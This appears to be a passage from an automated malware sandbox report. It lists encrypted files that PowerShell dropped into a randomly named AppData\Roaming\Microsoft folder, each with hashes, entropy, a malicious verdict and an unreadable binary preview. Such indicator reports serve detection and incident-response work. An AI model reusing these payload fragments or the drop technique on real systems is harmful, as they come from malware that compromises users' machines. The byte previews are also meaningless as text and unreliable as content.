Preview:	...@.\.[.R;K.=.7..o._......'.G.!&........#..r.L....!Q..2.......$.U.N.E..<W...S...,..MXG.dk.....7X.A.E....EH<.0.....!I..:.'.....I..6.p...;..b.;..?.(....p.._$1F..~.....#.u4....g....m.:....D...rJ..f.E.2..u.`45s_...F.^...CO..Q.-..}H_.F.:._..e...'L9v....]........@...t5....u......l......D7.U.D..A.(B.A.>...9A..a..[.w.n0.Sy(...~.8..t.c..b.Y.iQ....!/.C..e.CL..iM....b\..-.=........s..1"..8..?D...(..0..G.g.g...dQ+m`..e..d#...`..G...g.5+&...,p,r...K@....\[.:.y=..F`.7.+....3....0.E...(....R2U.l)..PP ......g........6......Z.\|O;.,..:%!}..jU%.R...S_o..~.W{..znx.....xl.<..c..j.7...Z..$..L..v..B..z).u2...3..j...r.B...%..r.c..J......f'..H.^...b.?FL..U.#..Z.3.9.....\6.b..f7...F..G.G&g..g7...$.U...,.+.B.[e...).d5.b.a.k..+.}S..f....=.]..w..sW#....)..8..bx...H...g.$'\l.....3[..}.#.s.s.0.`....y.C.g.....N......G.%.B....L.......v.J.....[b%.N.B.8..T.z^.l.:....@q...l......w......)A....5....Ax..Y.<z73......C...R..0..L....!...eK.\|l.....i.@vJ.....W8.kG.".......a......Qnc

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jHhxkmzcKIiOb.goRYkOBrtadJEI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	155685
Entropy (8bit):	7.998804317079381
Encrypted:	true
SSDEEP:	3072:kxh225zGUc5n/BcD1O36s+cIr1VpoPE/jgP9aSTZG+baw+x:o2Ect/EODIr1VmPErg1tVf8x
MD5:	338605F9ED868EC147C3A357ECC63D66
SHA1:	06FB7E770D306136BA63D2C584DB78E9769F1B08
SHA-256:	88016BA3D51F62EF788D343EB977AC44B8FEF9F5BD6429C1D2B1103BBD8902EF
SHA-512:	2BCB2681FBF7E9153F2D145CDD347651BA3D02D1177200A8912CB221503D01D1C513ADE05611772101925D8D553E310F56C6FE06C36608A6DC2D9D4835ED0DD5
Malicious:	true
Reputation:	unknown
Preview:	.....c..q.~.W~.. .%p.e....M....Z..5J.e.h..8.=(ao.....E.E4...=......r.....Xj,.x[B..90.bf...n. ...,m.}m.....;.k{..,\|.Rp.$E@.....z.!.....U2&yG.O......P.7,.....Fm.{..N..z.g....8.+J....N....N.WQ..V...b.#...k.k3CQ..Vu..F...+......>}).L..=..;u.......^.t....Uu......J....b3k../..[.Ds.?.L...J.#...(.yp......Owy.&....L......#.......0........GXpX.C...].\|r7..I<.u.g.F..I`...@).&.BA...$..x_.!D..G..).......;I.e.....B.S......H.(.x......:.0x...U=...9......c+pyA ..A[=.....#.hB.4.Y@^...!..4....7..A.........D/..8.2...9lC_..3m]Z.] ..@V^n..,M..e.}S.!........E.)....@.......Loa....~-;.......l..#..\|YW........p8B..U...t.~s....w.rf.9EiCvO7.Y..vx.sf.y.^.C.....T$...]..I4.s..^h..=hn.....lV[.B.u4......z.DH.5.%..M...yt..G..^.]..H..~.=@..mF..;>.~V...w...Z..Bk.....<4..m...p...........V..n.7 tL4.w.l...w..(.-...................r:./F...\|.-.wMrM.N..L..F..{5.+..bdD........S.l..I.a..E.s....IP.&=...5.b<g:.C&....s...U.* ....../u.`mp.MT..p.;pF..........v..v.z...(..Z..V..n.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jeYBAdKIPVcDXhsWL.zYVKdqyvOgmAGk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	70027
Entropy (8bit):	7.997933088357995
Encrypted:	true
SSDEEP:	1536:pE4jzycf93R3FyqaqUbKqIVo6LJYxAzopCF5pu4Hu9w:3jmcf93mqwbKfUAzzF5AOmw
MD5:	436DEB745C4F919821F53626DCBEB3DC
SHA1:	04DA55C21FBA35D8F0FE0E128AF22447A2398FD3
SHA-256:	BA20FC55AB0DC6368CEE34C0C1A0F24688A518CF290A1521CBD3433DBBBD8E92
SHA-512:	E7B2031A2AAE4D0C9D71CB95BA985A4E77412929F0EC34238915D1C139FFE6F96DBA16218F9D10C4176D4F571C294E50C9F44B92A0F97B638144B1367C9F60E6
Malicious:	true
Reputation:	unknown
Preview:	b^,x.X\|j..{.]...t.A....yT..R...a.}E_........D.x..CypO..`g.#.o....X..F......o5.R?...5..y.....F.s>.W.......H`.}~./..D...f..E.E8G...N.k...eN.0...9/.Mn..".1.....~....r0...r.k.{5l.......:....I./....-R..TFiM.wl.].O.(...y=H.."......W.k.s.~6....>.....$.\..6cJ$.a..B.@r+Jd..v.....pg..{.->..4y(....z.\|q...Hw........n.t.......<...U...N.Y%C._.X..,...e......c..k<gEp.S.0..H...^......,;.d0.T).NXh"N.k..%xf#..../......L:..r#!...X7s..U........XDQ..[Av..........Y#..x........0.....Xvn.....!;.~......2.V{%x.......3Cc.j.,.".....?.........i....d.:L.yX..!=.EZ..b.....C..KVQ..).{q..^O;".j.4M.B..............g....;.....Ma.;..R.)h.Z...!9.....&.L..b...4......m.9..~.)\|w..K....^\|D..d.JM..x.K...Y....N......'.Yoe#..C.g.M+o....q}...@....c..PR.Ta/...S.fn..`s.3b.._.y$B...Zc.`.n.M..P.).G.Ix..0.......}.f......X..r..5.b......).....pf{s.]5D.u..+L..>..G....."hA..d.*0..<.....K.j]....K.(pj..;..W..#C"R/O...(..8.e....G.....,......1.';Sd\Ve..r..Tu.V`..}.h..".I..^..1=.nH.....F.Ys-&..?x^

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jgeYPaxbOi.QUCDAZjydfuYgXGsnJv Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	165855
Entropy (8bit):	7.998865686247877
Encrypted:	true
SSDEEP:	3072:njH4koDgtFNUxKy2o+cjqTTVUUNXxrdjZPiX35arvhgvxB9GBMXcGJLF4:nz4itFNtHfVUIdbqXpa14xBa6c6i
MD5:	DEA503516C4DD4468AB7DBC8EFA94557
SHA1:	C655369628D10E874402134B6F2EF4C8A814EBF0
SHA-256:	A192470AD02F8851F179CCE9CB266DBD0288789EDC69EFA34283F01C312FC11C
SHA-512:	1A71070DB9296857C879D1F603DC0E1491A9BAF1F68975E8E1B906988EC436EFCB4F6E047B6F218BB65CC0D2E1108C1DF49C163A3F0DF5645F1201C0FE4EFA74
Malicious:	true
Reputation:	unknown
Preview:	f..xVI...[.x...;D.QL.,.Oh...(T.^2...\|rq.. .....?....#a..](..v......m...(}q.{..M.X.).K:.PV.T...d..U.9...@....K.....`fZC....fkMR..).N..E.$........8X.+O..)....1..yj.X.;}.{J.)...j.;...<..5..M....y.U.M.............."?.i6..1Py...:.@P..t.P......#0.K....&C....6.9...WA.a..$.o.e.....c}...!..&...$....Y......L..uXF`.^..J.....@...._.F..5f...9...jE.G`}D...90.o..$..A7..M@..z...#.<Of~.{.K.?..Mu....3...5<y..}.EZK..S.B...v...I.........B....:....Y!?..9w.1tI.q...y.[A.......<....Cm....y....7..d...VP.a......dGpBT.l......$,B..s^j.W..M...8i....]..d...~FYn^4...L=..u..n`.....k..^......W.a............b.e./C]..:....N..:'......{}...b".:.,....mM.f.....}&....$x.).._u..qu.".;&..:...}.{...o/`...[L...1.~.ufk..J.w...6dU..7.B.@o.....b{.dg.P.,..`.......=...V`.`..y....=...D....(2.]T!..0...f]....f...BV+.$.}k.).K.$.u..J...C..X.._...H.f2...Y....h\|`...a..D.I..o.{.N.4=B;.eH.4...5.9.....C.R."vuv.-!..H#.s.....m9.Q...k\bj..Z.U.....?.z...<>.#U../%...B.tkP.8.Z\|..........u.,.?.....0..-..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jhwSkizEpmgVnIBCQ.riAhHNcWxbLoau Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	171265
Entropy (8bit):	7.9990833423667045
Encrypted:	true
SSDEEP:	3072:AjsDSL+jbf2LrrvFZqmlr8OxhwIb/6ngsD7YmvaBcpmBm1QZ:8PkfUnPNp/mZ1QZ
MD5:	790B0EBAC2DA829781EADA91582412F7
SHA1:	4506F39D96E4E13E72E5F2DE766C539563D35C57
SHA-256:	C2F9558B727334B9715FAA66668856059FEE26BC565B920673803D45AC828686
SHA-512:	FA8D748CA9004963017541F39DA78E8A4CEB29E82ADA5C57E17C332C5646E8A12C3DC1B9AB3A391B6F8C7012753444C4EEA8143EBD2746403CD8ABE3E0567E25
Malicious:	true
Reputation:	unknown
Preview:	...-..,...52.....d.Ip.&.3X4u.j.....(.EA.v].u=..B.....D2......$..G..>.l..[.....2..o'.........x8....W#.kr!1J.E...$.4d.Y....D.r..#.T.<..U..p_..}..dJC.(........=@.ia.S.ub..S...I."...>N...... ...0..^..i\|...H.uo..J...e.W..9wAv..Z..FK..].....=65.........B].N...sE.@S...+..m..A.y....@.l..t.:....Y...N.../m.F...F;.~..Z.U.Sn......... 2...;...yX)d...$M..._R{t.V...C4\|.%..m.`...D=....)}...x....,.6$.]....].../.X.......d(...{...L..t..0+.3...m..B....c%.;..l........a?x.c..c..G.....\|Oo.I......M...t..G.5..~....$....v.^U..U^.O.K..F..\.........%.`&....\|u...r.W..P......m;.._i...fF2...`.......J..8(W+...z..$n.H.l..y..i.....mx....n.:E%.`.c;m...U@.......[.:....gVU.TDS{..9l...\|#.\D..#-.....^..,.\|.{.@\|..+RCZ....!E...2'.&ZN.S.w?................{b.&Ir.........m.h.7`)..;LVRCM..... .To".5.$gw..e..BIuQ_..&.r..t...%LO.l.c.h.1.K..).>.a.}1 EH....."w...3.].8\J.u.x*51G3....#!.a....(A._1hVPL....m}...yz........6.G0.T.3.......!"j...G!..o9r..\|.D.Q?..JR........1..n`.%...y..V\|...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jmGuOcMCkqWFXUZYwa.BGaLyxeDdVnvg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	79630
Entropy (8bit):	7.99764158401107
Encrypted:	true
SSDEEP:	1536:Q37y4tRHL2JIAs6YyJctdJtOYp8Ngm8/gvTru+0wG:Q373tgp8PJtOsCgHgXu+07
MD5:	FE6EDB83B1CEA3578C8E9B893CBE7093
SHA1:	BED619680236604F4AA1B94D32483360BECA9856
SHA-256:	7DD6DDFDD5A0BB6DEE9D572FEF452E88CC26A4730277963D033B92C74E95FAA3
SHA-512:	CC11621C6B706B610FDE21866E9763F080BB958A2EF21671E305B74D63FF2AC1DE71974AB59198232E8B21E6ABAD3687216BA0A9A3CC941A077583AA226431C8
Malicious:	true
Reputation:	unknown
Preview:	....!.4~..........L`.........g..n....L.."._/d&s.j..Q....I.(.".3....@`L..Ja.Q.1.3O..M...!>.FY....,..-oY.\|.....{t.8.`%...o ..`.Ljva.%.X....Y..-0./!.s..E.h..V.w...IRU...0j3_.cZ.?..+.....,.9.H .....m.puo....R.....{..ue....>.h.....f.Z...&..h`.u.6.. !...Jx=.j..7..D.9.q...O...Au..:...H.j.!.G.`]D}Fp.a;T......G.<.V.Ni.t[...I..Cb8..x2~.._2@.......ASH.....-.x..mp%..P2.0.b.7ncy...q.X..)#)..Q.<U...U.....\|. .`n..p........&....&....:W_..Gt4...8..........b..2......c.0....wZ^Tk+Zy...dq.....t.....Pm\|.G...]....AE.E.....3...4c..Y......o.3....@../.>...R.H.:.tg....+TH...t...<.}..3..<?..'.....1L.a.B..i ./Z.....AAH.n..-...J..X..@..ZL...,..#.w..r}W...~@.S{y.PN.s.c....D.R..u..(.Ob.{....E...E.}+....S...&..f..iRd......QRF...9...I[].+....T.v7.;.5O........U.~....<8.=.......el..s.....S...L.f..k8.....}....{.. .....c.1..d.x=zJ.S...=....m.IR+.b....Q.r.8.....,.6@1\.6]xW{......}..~W.~_...e.T.N....1..rx.....&......U...g.a....;.m.".....O..v..r.L..mPV._9...L..Q.v.Q......[h.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\klWhDKVjsenqCFGPTOu.TUxBOqdDReShXN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	7.178855224242884
Encrypted:	false
SSDEEP:	768:IQMtEybwzzDhc4OMTkMCrSKy15ScDBwWQzvjFAg6xparPVr6eR8u0TdnV:qtEybwzPhc47IMCWKy1zorFuxiNmNH
MD5:	2DC7BB5C709188C25D66E88A7D75210F
SHA1:	8C076870ADBB57BD7E3A555A82229D39C116C387
SHA-256:	0413934D2DCCEAC577C5939DD30F0F2A1B643A3D165BBD42733DCA4DDB8EA3B0
SHA-512:	C66A050A061FB5E00DE26E5EF5C845F9B48001D373D4BB886696FC2C771C5770DC96729F97445FDA0FF356891C555F2B94D29429C0D51401C1FCD5C75571C6DF
Malicious:	false
Reputation:	unknown
Preview:	...aWnlwgVot..Fy.V55cWxT.TxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6.iNhkK.<J.9.x.f\|.t.9.0LI.9.F4\iW1.W[!.,.C..?r< .&}c.$\.1z[O@AHxRO1Zz1vJq.FY9.}3c2V0Z0l1.Uf.DI{4M.d6c^d8ZnJr..B8fLpJQ.NlNChQcMpefiBy]XFCQHU8IHZAYGthN.BUN35vQHZWHW,.MWwjJ{BUIXxyQVVEVEdAIGF3Z0BSb358..BK.09Ae.VD~o4xaXV8QF8/cF9eT0NIe.B1\DY/PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMgpt_mtGKWN6diNhmtd2.W0xYXg0UUFQJ7.A.Vp4.NI4PM94U.NwchtQRUN5b205I3lTtVBK:. ,1Zzy0JqM.Z9USZRc.V0Z0l1IUd7OHp4.FdvM.T5.JroEB8f.pJQDNlN.hAcmpefkByYXFC.HUzMHZAYGthNkBUN15v..ZWKWle.WgjHkGU.1hy.sVEWEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/CufaAnlwcVotc}n.UV?6.VxTRV\|.I3Fue299pIS4dFFyTVdvO<qtWi^GXgO6ciNheTd2H,2xY\M.U}cQdEl.{TX3U1C.C]84^3Nwbjt@R'.6bB:.I5FTGfCJnHxRN1Zka.pqMMP.UQpRp.W0J0l1HUd&O`K4ML..cXn2qnLXpuF8kmpJSFN}N=lAci]vr.D_YX@0qHU2.LZA]lt.JkBQf.5v[n)jKWfo3RgjNFQA.^OyQ@%eVEn.\GF7q0<Vb31.pGBA\|&2j.0(Bfl0UrL.>yF8).f9e^.HIeAi1.BY/TmEaTdJqaQw.wXFsuU75c.FTV^PEK3LY.293.8R4i`8~TV`[^S.r~mtA8wN6n.IhePO24P0x]pF0U_`Qc[42bT.'U1C,..;".2C~Y....+F5b6.&

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\klpgDZItxRGwehcuA.wqxWrudDTltHN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	172920
Entropy (8bit):	7.998820421031491
Encrypted:	true
SSDEEP:	3072:w2pCmwgX0WN/gA2BrbNb2EzSapEylWNL8o+Vbqo1ZItl7/6EmsbyIIkDN6dsB:w2CgtN/p0S0ZpEYWNWVb7o0EmsemNtB
MD5:	4A064E8598C1F4396BE7A8BEB40F6C6F
SHA1:	5B90CA33F2D6F7A5E6C0CEE6F3F8247BFD89E37B
SHA-256:	428921443091CCF19A2D6F62FC6B8406EEBC2570D41491EF327EC8CD4EFABDBA
SHA-512:	B86A2C333490BDEF710EED101CEED17D68ABB1FC1B3F80070455EBB938E75364D09368CC719F235652DA713ED5407DF73BC75FFB1395F5F20077879E1A82BA7E
Malicious:	true
Reputation:	unknown
Preview:	Z..4.J........2y.....0.H...I4e4..N{s..5{..j.Z..Y..g....!....r...h.,...h..K.`j..3..M....Q.$L....D.:....c..<.Y..>..Pj...........m.._.K......7.H.N6..j..........Q.Y...........e....."?.e..v.j..x.>..p.V/..x.4....h.ki..x/.N.k1.M.w.k.K\|.L."1.."...z...UP..jG(...7.k..u<.RnGmG....N.u.As...Y...I..(.x.=......Y..@. Z/....!..;.t.{....q.8, (...BDN? ).{.]1.W8Z{...lmbs...k!.t.3$/...S.. .D}.}\|.p..W...jp..ux....(....P.Lf/f...CQ..#...#8.m.s..=U.""U42.7y..g..2&...\|...........1. /....s;,~..I;......4.\.k......c..........<t}.!..?JX&..Q.L.;_ @.)......=s.....r...Q..%..cp)....3.....x.2..zm1+..6.....ZU.B.X.s.../]...JQ.....Z.L...Q.'/.:...^..."..RVbE.._.y...u.h.JA6..."."G3.)3^.II.\.....-..w2...L..f.O3R#.[..E4.m,p.g>W...+........3N)6..=.8..p....;.cN.ox..w..&9_....!.0V(`.m.g.....J.APJ..!dp.....4......:....... n.M0?5K.....ng2 ...?".bt.M....ks...A.D>....!m......cG..u.AL.hm]eLa.+.m.QlH.,,...Z.a...ua.....6.!@.j.O...KH./iV....ri.?j.....p...Jh...h*.....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kpTXHNogYaW.eKgcqpzOrTwakSJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	117532
Entropy (8bit):	7.99832493798417
Encrypted:	true
SSDEEP:	3072:tFJo5qTzmC83DZGHXlZEO2Ma+83s8k0UcRuLBuQbJ8jr:t9TzOG3bEOi+83s8kFcRuV3dQ
MD5:	EFDE5A2F5104A84EC175FF6FCC4C94D5
SHA1:	0006F2A75458044FFC0B411EADC4F62CA76489AF
SHA-256:	A21CCB95F986D8D3DA11D8F1504178418F6278E7B5ADF3D88ECB03E97F494EF2
SHA-512:	0133AC86EBE24C227B9843EA08C3FE8BA7FAFDDC680E4152FD9D05493F6ADD24FB0A633786B64A037F1D1E33751561F168B208F58E4B347A16EA76D92591B0FB
Malicious:	true
Reputation:	unknown
Preview:	.4.........hoD_r5O./......./9...N..n...3.$.......no(&1....iO.......g.jXO..@,.O..T..Z..<.o[.ua.'....}a...'....:.....`;...r?.....]DG...!-D.xtJ.d ..f.cn.....".rE.....W.$..{..if....7h..F......z..p...j.B..Q.qK..G...Q2%.....Y..I.....<.xK....j.%..Bc..K..2............\t=.g.7.41........>..........d..,.B1..).......q.o._.g.Pv h..W............Vnl.&2o5.MQ....}Z.:....%m..:...I........7....-..(...qc.n.!...p7{8..9..8R:....QCY..._e....e.~......xx.w......_h.r....yo.]D..Ta..7tmn...<.........og2...jfh....<U%....o.b...@q...=8...^.\|...x.f.........1..P..E..l.p~.W[.Y..g5n{...k."..$..v...?.h..fAW.........9...N..3f...T.'...~fh.\.....^7....h.u.5.......`.P.]7...K.....%.J..!...Xw.X.9px8..G....c~\y.s..A...?.s.\|.Y.L..K3b;..;w."...C..8z.....tf......J........l......AWd.iq&w6.uo..6.2..*z..z.v..x...D@....;...R.a..Z$.X.........naNBK.,.C..-...w.A...x.N.R..B...].z.y<F.ADf.veLY .m....u..k.x....0&..dM...4...z.Z.dkrN...w...?CM.F?.9..h........~..b.l....4T`s.89.;S!....~.,..i..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kujramzixNSqnpAe.mBzxfrGgZdECPlqV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183557
Entropy (8bit):	7.999031365173289
Encrypted:	true
SSDEEP:	3072:njH4koDgtFNUxKy2o+cjqTTVUUNXxrdjZPiX35arvhgvxB9GBMXcGJLFk61BSO:nz4itFNtHfVUIdbqXpa14xBa6c6t1BSO
MD5:	40009F976A9D70410A304AFB08771470
SHA1:	09EE8FCDE9F4B5D05ABA4C0545E7DFFE4E90EA9F
SHA-256:	D13E2FCE13E93FA715C0AE2AE2245B15DF4373E5891A92A7CD214DA1DAB6AF7B
SHA-512:	BECE4849EF9DBD6278A6D20BC95BB926F13A4F3D351E39948CE66501D7354EC35F347976AD69052F7F6348A81520ED5950C339117F15701266F0D5A8E4226B56
Malicious:	true
Reputation:	unknown
Preview:	f..xVI...[.x...;D.QL.,.Oh...(T.^2...\|rq.. .....?....#a..](..v......m...(}q.{..M.X.).K:.PV.T...d..U.9...@....K.....`fZC....fkMR..).N..E.$........8X.+O..)....1..yj.X.;}.{J.)...j.;...<..5..M....y.U.M.............."?.i6..1Py...:.@P..t.P......#0.K....&C....6.9...WA.a..$.o.e.....c}...!..&...$....Y......L..uXF`.^..J.....@...._.F..5f...9...jE.G`}D...90.o..$..A7..M@..z...#.<Of~.{.K.?..Mu....3...5<y..}.EZK..S.B...v...I.........B....:....Y!?..9w.1tI.q...y.[A.......<....Cm....y....7..d...VP.a......dGpBT.l......$,B..s^j.W..M...8i....]..d...~FYn^4...L=..u..n`.....k..^......W.a............b.e./C]..:....N..:'......{}...b".:.,....mM.f.....}&....$x.).._u..qu.".;&..:...}.{...o/`...[L...1.~.ufk..J.w...6dU..7.B.@o.....b{.dg.P.,..`.......=...V`.`..y....=...D....(2.]T!..0...f]....f...BV+.$.}k.).K.$.u..J...C..X.._...H.f2...Y....h\|`...a..D.I..o.{.N.4=B;.eH.4...5.9.....C.R."vuv.-!..H#.s.....m9.Q...k\bj..Z.U.....?.z...<>.#U../%...B.tkP.8.Z\|..........u.,.?.....0..-..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kvAOLpQChsVPulcFYW.bhOGDkfNuKr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183548
Entropy (8bit):	7.999003021670819
Encrypted:	true
SSDEEP:	3072:fEajZ6dbIt4V7ThzCYuq5IgtoRcaB0VAxPjKkU6OnKqnIO:fXZU8lXgUc/QrHElP
MD5:	BC9DEE4C63C2DACAF0261216DEF502A4
SHA1:	6ED3D95FC7EFB0E5CDB995B0DFE5C742E10D9943
SHA-256:	79B6D09C1FF7F8056F50375A192FF9EA75C08ED25210C1F438B9718A74D114BC
SHA-512:	8B9C6BFF1CBC4B8CD550178F754E6266212753A95FF476C5F2A9B3DDDFD304B12089535E0690768D3EE5051A30A6A0AB67C6BC6E23A5849C7C86FB65A9FF945A
Malicious:	true
Reputation:	unknown
Preview:	m.SwM+.......Jj..J.\...F.9#...$......b.~\.!._.f\..f.....0..j9%.w..B..3bd.0..@Aw.#{....'.....E7..i{.......>..1.ky...m..b....~lI.......)H}...Aw!..I{m/.....d.2zc.6..UZ.....,...!....4..hl...U..U"d...M....b`.....72...Y>IEt)..-._....g.....:.....q'\|.\x..X....5v.}q.f.)..g8<.}9B...7av)hJ....5Y...qD.cG..$;z[.i..}?..Gx.....1.fG...Xnq....,.\|.y...Y.3j.x..,..qE.3.Xk.Sk...3AKK++A.^..f\....D..a.W..../6.M..7.,P...6...o[.i.......p.2.qJ..O%G.l$DSW..-_....].D.e88..lZ.W....."...\68.e.......8...K.....A;..R..u...R,.. .s......E..D`..dt.m...3..\!4.t..x..d,....w..oC.>X..5 .,O?..(..q....F7.;..\|....F.. .]_.\|.$k.....;.w^..K..>...$W..P:&4G9.!."...uvY.C.7..\|c ...iFH.QR..../$....RY.:(ac..s.{....m.....uU...y.U........4..Y:B@....9..[..{..I.6.!&7.Mq.....?.l.2..i...[h..0....4..8...D8..Vx..x.....+^....M@...p..3q'.C1/..... ...U..I;......L.^<D.Xp}e..o..b\..".2.iN~'..L9..;..;.t.U.Z8Y.E.\0.pr.+.4...]m}0+..3..&.......i8........F.>..*.w..zf..]i..B....~b;.#kA..c......o&')..k=..].aB!..].

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\lDhgBpdXGP.GrLnIePcdiVTR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	117165
Entropy (8bit):	7.998379602931344
Encrypted:	true
SSDEEP:	1536:d1isiVsDD7QbNhZ3a2cIZj8c9Z0mvB8/ck5WEef+5eo2I+F1obH7MlODFKOy:dU2P7QbonGjRZ0mvDxW5eo2Ii1UHSd
MD5:	CFDE75D100A7CE25ED493003E5614C16
SHA1:	87341F3730F8CCBFD6D6BD1B330FE752AD8B8DE9
SHA-256:	88325C457359CB7857F3A2AC680228CCD6F48A2C9838E5358885924DD45D701D
SHA-512:	FE85455D44D1AD52F3744118560F576AFED4D84899BA82F56B7601DB25BDCF420CAA82EC2997E3F03BFFCC869370511D1CA4F18E5E49DE3F0D9B3AADFD9A08D9
Malicious:	true
Reputation:	unknown
Preview:	Xzw...0<...m.9.Nlu.B>._....:.D...dB._.P....7@.]..&X8..M.]...3..PXg...$.9g.'...at.4..q.......H....L.o3s.K.......O.b.....j.'.t.?.........~...~.c+A....e..~...)~..N.P.Y.n.......... {..7.S..f.%._....}...J.?...~m.P........Bf..&..].@......>3...i{V.......If....k. q..\|sT.L.)...m.nC..\|....LH..w..3x.n......Y5B..@N=.1.s..'....../...E.....d.O.\|90.....#U....6HI.p......m.Sx..\|.7.n..[...3j......;;..A6[....q?>....hr/.B....M..i\.<A..!,.{.A.g......!.'.%...8p..5W.Z..]6..:.1E.Y....H.....E.9m....../...0pQ...L....jq......&.x."...=.. ..R.. ..Z<.X'6.n.J.O..3...J`.P...T..j(....o.9...E..>o...e.._5...A..L.;".........f..y.....).m.....S$......v....A...r$....f6...:.AC....X..O..].Q!9}t....\P..\......X4.+.c...Q.....x.../.-k.............H..d.{.d.G...:'.....Z.R...L.OJK..W.Y..l4......E..;..0G.y....E@..8..x\....v]o.B`...j^..(8..4.;...D.+.%.1m u.;.C.c....x:&..@..JX..d...~..f.=....v......I..R..;.#..g..oL.. .{....$,fy>.HQ ..z.dN.u.s..]C......\T.......0...m.B...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\leODoNBzGaTbiPsc.dXxMCqQBZWkw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	70130
Entropy (8bit):	7.996656624364918
Encrypted:	true
SSDEEP:	1536:MBFWwEGp+nzS8rtTDbg9R2z+LDJ4SrB6ZpW7IdwuX2PS1NFG3:MBFWwEvrt3bg9R2z+J42gWWNI3
MD5:	A68E767BE6201ABF9C30A85C81B76C05
SHA1:	F9337DEE2E8030C580A3E7AD8E3C2EB71B9B726E
SHA-256:	2EBFD4B57348C7BDFBF6A46E05F9179ECF914BFB86A42205CE27ABA549C88690
SHA-512:	0D55E11BFB48103D00BCDEB6658A50EDF1ACF21E540D4B093D180581E440E7A4CAB8BE6D04FEFC5F7633B37EDDD28388B9CA7007269F34FCEA72E161B2B37F28
Malicious:	true
Reputation:	unknown
Preview:	^{..+...M.". ..j........e........6/...C.....G..Hbg.SP..R...t..Gm.r.X..+P-......'\|.Y.w.N.mB..E..J.)l"Yq...#......Lzu..DHir...&5.......~Gt....0..n[&.....:.p...5....~o}p>2./.......f.q.......}...O..Xz....O...vv.r.a../X..k..g...LA....~.{.!...F.d.c&......0....S.4...L..S......y.....7.....c....FX...M.1........}.t.]....m.O. .,$....k..su...@...Z........j...J..5J....T:....~b.a.......Q.....B..)A.U.....Y\|P.<..{.xsF~..E. ..g7S,)Rr.;..8rd.f...V8..r.#....'q..H.6..=.wEP:...-!.6..X...^.2..{.~.R.....,B.\|.@s.............~.._....3..SE...\|."....5G{f....v).}..g.....[....w,[...qt."T.B. ...3.[.;9.;.3.....h.Rt,..!.D..DH.{......"C..=..i..jg..i.R.9.......^......00j.....1....o.B....\|..C.=KV..R..]8.U....o...pG[.k.#.....)I..06.O..71....3.......md...j..9.o...*..R..Z.5.\|..I....KP#g.H....u.........O.f}.x.M.......[.u.`."....<....9>U.y/:.gK.{.p.Y.q1...C._.U......D....{:....,.N.i-T.mO8...u.L.v4,i.v.........k.Ve.sAR.P....VO`@.f!\..p_.Z..&U.Ti2{I4.8..b..n.O..]

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mRyupfblQnzEgSGB.UgIHfrDaVvTh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	116522
Entropy (8bit):	7.998222919830464
Encrypted:	true
SSDEEP:	3072:gdJOUjFl7UDqth9O0fWXxUgmyFUB8g20KEQ5A+cZc5Vb3nJdg:lUp2DqpXfk29u5A+cZc5Vddg
MD5:	16A6191F1FD7407096459AE643368C59
SHA1:	FE46F7EDA022AE307018B7CED61E799773873F9C
SHA-256:	E5A2961074013B7A1B3C509F9F96E77B075ED58DF0563138A9E83EA9B472797D
SHA-512:	B025D183E5515254882219F9F1D80C74C738B0BC2972C80C48ED1D8D320D10E81D059957D08A03882BA58D42491A96E0E65D364DD5C2A7F61130F820A00BA9B9
Malicious:	true
Reputation:	unknown
